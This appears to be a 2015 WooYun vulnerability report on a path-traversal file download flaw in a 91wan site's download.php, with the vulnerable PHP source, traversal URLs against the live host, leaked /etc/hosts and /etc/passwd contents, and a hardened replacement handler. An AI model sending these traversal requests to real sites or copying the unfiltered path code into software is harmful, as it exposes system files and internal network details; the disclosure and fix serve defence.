
Arbitrary file download on a 91wan site

2015-05-27 11:25

Arbitrary file download:

```text
http://lwjs.91wan.com/huodong/bizhi/download.php?f=../../../huodong/bizhi/download.php
```



Source code:

```php
<?php
// The user-controlled name is concatenated straight into the path; "../"
// sequences are never filtered, so $filepath can leave ./desktop/.
$filename = $_GET['f'];
$filepath = './desktop/'.$filename;

// Only the name later used in the Content-Disposition header is encoded;
// $filepath itself is left untouched.
$filename = rawurlencode($filename);

// file_exists() is not an access check: a traversed path that points at an
// existing file passes it.
if (file_exists($filepath)) {
    $filename = $filename ? $filename : basename($filepath);
    // The content type is derived from the user-supplied extension.
    $filetype = trim(substr(strrchr($filename, '.'), 1));
    $filesize = filesize($filepath);
    header('Cache-control: max-age=31536000');
    header('Expires: '.gmdate('D, d M Y H:i:s', time() + 31536000).' GMT');
    header('Content-Encoding: none');
    header('Content-Length: '.$filesize);
    header('Content-Disposition: attachment; filename='.$filename);
    header('Content-Type: '.$filetype.'; charset=utf-8');
    readfile($filepath);
    exit;
}
?>
```

Proof of concept:

Reading /etc/hosts:

```text
http://lwjs.91wan.com/huodong/bizhi/download.php?f=../../../../../../../etc/hosts
```

Returned content:

```text
192.168.1.14  passport.91wan.com
192.168.1.234 datacenter1.91wan.com
192.168.1.235 datacenter2.91wan.com
192.168.1.22 datacenter3.91wan.com
192.168.1.23 datacenter4.91wan.com
192.168.1.17 bbs.91wan.com
192.168.1.14 login.91wan.com
192.168.1.11 cms.weedong.com
192.168.1.33 api.weedong.com
192.168.1.15 pay.91wan.com
121.10.246.156 center.yxwz.com
115.182.57.148 91tool.lq.the9.com
192.168.1.16 kf.91wan.com
115.238.100.45 91wan.admin.mccq.com

116.28.63.170 user.test.by.91wan.com
```



Reading /etc/passwd:

```text
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
news:x:9:13:news:/etc/news:
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
nscd:x:28:28:NSCD Daemon:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
pcap:x:77:77::/var/arpwatch:/sbin/nologin
rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin
mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
oprofile:x:16:16:Special user account to be used by OProfile:/home/oprofile:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
ntp:x:38:38::/etc/ntp:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
avahi:x:70:70:Avahi daemon:/:/sbin/nologin
xfs:x:43:43:X Font Server:/etc/X11/fs:/sbin/nologin
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
nfsnobody:x:4294967294:4294967294:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
avahi-autoipd:x:100:104:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin
sabayon:x:86:86:Sabayon user:/home/sabayon:/sbin/nologin
www:x:80:80::/home/www:/sbin/nologin
nagios:x:500:500::/usr/local/nagios:/sbin/nologin
mysql:x:501:501::/usr/local/mysql/var:/sbin/nologin
91wan:x:502:502::/www/html/:/sbin/nologin
soft91wan:x:503:502::/www/html/soft.91wan.com:/sbin/nologin
ossec:x:504:503::/var/ossec:/sbin/nologin
```

Fix:

Filter the parameter so that it cannot traverse out of the intended directory.
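The fix suggested above, written out as an added example. This is not the original 91wan code nor the WooYun reporter's fix: it is a hardened replacement for the download handler that assumes the same layout (served files live in ./desktop/ next to the script) and the same query parameter f. The extension allow-list and its MIME map are assumptions chosen for a wallpaper download endpoint. It goes slightly beyond the one-line recommendation by also taking the content type from the allow-list rather than from the user-supplied name, and by rebuilding the download name from a safe character set before it reaches a header.

```php
<?php
// Added example (not the original 91wan code): hardened download.php.
// Assumes files are served from ./desktop/ next to this script and that the
// query parameter is still named "f". ALLOWED_TYPES is an assumption.
declare(strict_types=1);

/** Extensions this endpoint may serve, each mapped to a fixed MIME type. */
const ALLOWED_TYPES = [
    'jpg'  => 'image/jpeg',
    'jpeg' => 'image/jpeg',
    'png'  => 'image/png',
    'zip'  => 'application/zip',
];

/**
 * Resolve a user-supplied file name to an absolute path inside $baseDir.
 * Returns null for anything that must not be served.
 */
function resolve_download(string $baseDir, string $requested): ?string
{
    // 1. A download name is a flat file name: no directory separators, no NUL
    //    bytes (which truncate the path at the C level), and not "." or "..".
    if ($requested === '' || $requested === '.' || $requested === '..'
        || preg_match('#[/\\\\\x00]#', $requested) === 1) {
        return null;
    }

    // 2. Extension allow-list. The content type is taken from here later,
    //    never from the user-controlled name as the original code did.
    $ext = strtolower(pathinfo($requested, PATHINFO_EXTENSION));
    if (!isset(ALLOWED_TYPES[$ext])) {
        return null;
    }

    // 3. Canonicalise and confirm the result is still below $baseDir.
    //    realpath() collapses "..", "./" and symlinks, so this check holds
    //    even if some encoding trick survived step 1.
    $base = realpath($baseDir);
    if ($base === false) {
        return null;
    }
    $path = realpath($base . DIRECTORY_SEPARATOR . $requested);
    if ($path === false || !is_file($path)) {
        return null;
    }
    $prefix = $base . DIRECTORY_SEPARATOR;
    if (strncmp($path, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return $path;
}

// Reject array-style input (f[]=...) as well as a missing parameter.
$requested = is_string($_GET['f'] ?? null) ? $_GET['f'] : '';
$filepath  = resolve_download(__DIR__ . '/desktop', $requested);

if ($filepath === null) {
    // Same response for "rejected" and "not found", so the endpoint does not
    // confirm which paths exist outside the served directory.
    http_response_code(404);
    exit;
}

$ext = strtolower(pathinfo($filepath, PATHINFO_EXTENSION));
// Download name rebuilt from a safe character set: no CR/LF, quotes or
// path characters can reach the Content-Disposition header.
$downloadName = preg_replace('/[^A-Za-z0-9._-]/', '_', basename($filepath));

header('Content-Type: ' . ALLOWED_TYPES[$ext]);
header('Content-Length: ' . filesize($filepath));
header('Content-Disposition: attachment; filename="' . $downloadName . '"');
header('X-Content-Type-Options: nosniff');
readfile($filepath);
exit;
```

Two things in the original code are worth keeping in mind when reviewing similar handlers: file_exists() offers no protection, because a traversed path that points at a real file such as /etc/passwd passes it; and rawurlencode() was applied only to the copy of the name used for the header, while $filepath was built from the raw value. The realpath() prefix comparison above is the check that actually enforces "stay inside the directory"; the character filter and extension allow-list in front of it reduce the attack surface and give clearer failure behaviour, but the prefix check is the one that must never be removed.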

Source: www.wooyun.org/bugs/wooyun-2015-0115420
